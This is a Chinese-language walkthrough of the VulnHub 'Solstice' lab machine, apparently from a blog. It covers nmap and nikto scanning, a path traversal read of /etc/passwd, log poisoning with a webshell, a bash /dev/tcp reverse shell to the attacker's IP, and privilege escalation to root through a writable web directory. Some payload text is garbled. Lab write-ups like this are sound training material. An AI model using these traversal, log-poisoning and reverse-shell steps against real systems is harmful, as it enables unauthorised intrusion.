vulnhub靶机Solstice

下载地址:https://download.vulnhub.com/sunset/solstice.ova

主机发现

arp-scan -l

vulnhub靶机Solstice_第1张图片

扫描端口

nmap --min-rate 10000 -p- 192.168.21.147

vulnhub靶机Solstice_第2张图片

这里端口有太多于是我就整理了一下

nmap --min-rate 10000 -p- 192.168.21.147 -oA ports

vulnhub靶机Solstice_第3张图片

数据整理

cat ports.nmap|grep open |awk -F '/' '{print $1}' |tr '\n' ','

版本信息

nmap -sV -sU -O -p21,22,25,80,139,445,2121,3128,8593,54787,62524 192.168.21.147

vulnhub靶机Solstice_第4张图片

漏洞扫描

nmap --script=vuln -p21,22,25,80,139,445,2121,3128,8593,54787,62524 192.168.21.147

vulnhub靶机Solstice_第5张图片

Cve-2010-1344资料

vulnhub靶机Solstice_第6张图片

拒接登入=废的

看一下网站

vulnhub靶机Solstice_第7张图片

说白了啥都没有

注意一下apache的服务其他的端口也会有web

vulnhub靶机Solstice_第8张图片

vulnhub靶机Solstice_第9张图片

纯白没有意义

对8593下手

没有任何提示我们需要漏洞扫描了,网上找找就能找到自带的漏洞扫描

vulnhub靶机Solstice_第10张图片

一般信息

nikto -host 192.168.21.147

vulnhub靶机Solstice_第11张图片

敏感目录

nikto -host http://192.168.21.147/dvwa

vulnhub靶机Solstice_第12张图片

突破口大概率是8593

于是指定端口扫描

nikto -host 192.168.21.147 -p 8593

vulnhub靶机Solstice_第13张图片

vulnhub靶机Solstice_第14张图片

任意文件读取?试一下

192.168.21.147:8593/index.php?book=/../../../../etc/passwd

直接式一个一个加

vulnhub靶机Solstice_第15张图片

这里已经发现漏洞了那么,服务器又是apache就需要知道apache的敏感文件

一般就是看有没有日志能看

vulnhub靶机Solstice_第16张图片

PHPSESSID=pfkvbugcndb8fglu2i75jlnlsu

拿到PHPSESSID,直接开搜

vulnhub靶机Solstice_第17张图片

不用说就是命令执行

正好80端口有,我直接nc连上去,来个一句话木马(别用post之后需要在url上反弹shell只能用get)

nc 192.168.21.147 80

GEThttp/1.1

vulnhub靶机Solstice_第18张图片

接下来需要反弹shell利用一句话木马执行(进行url编码)

bash -c 'exec bash -i &>/dev/tcp/192.168.21.146/666 <&1'

vulnhub靶机Solstice_第19张图片

Shell优化

python -c 'import pty; pty.spawn("/bin/bash")'

信息收集

find / -user root -perm /4000 2>/dev/null

找root的文件

vulnhub靶机Solstice_第20张图片

一看tmp/sv就很可疑

进去看看

vulnhub靶机Solstice_第21张图片

接下来需要找到哪个站点能访问/var/tmp/sv

ps -ef | grep sv

vulnhub靶机Solstice_第22张图片

57端口的web反弹shell

vulnhub靶机Solstice_第23张图片

vulnhub靶机Solstice_第24张图片

即可得到root用户的反弹shell

vulnhub靶机Solstice_第25张图片

分别在/home/miguel和/root下找到两个flag

vulnhub靶机Solstice_第26张图片

你可能感兴趣的:(vulnhub,网络安全,安全,系统安全,web安全)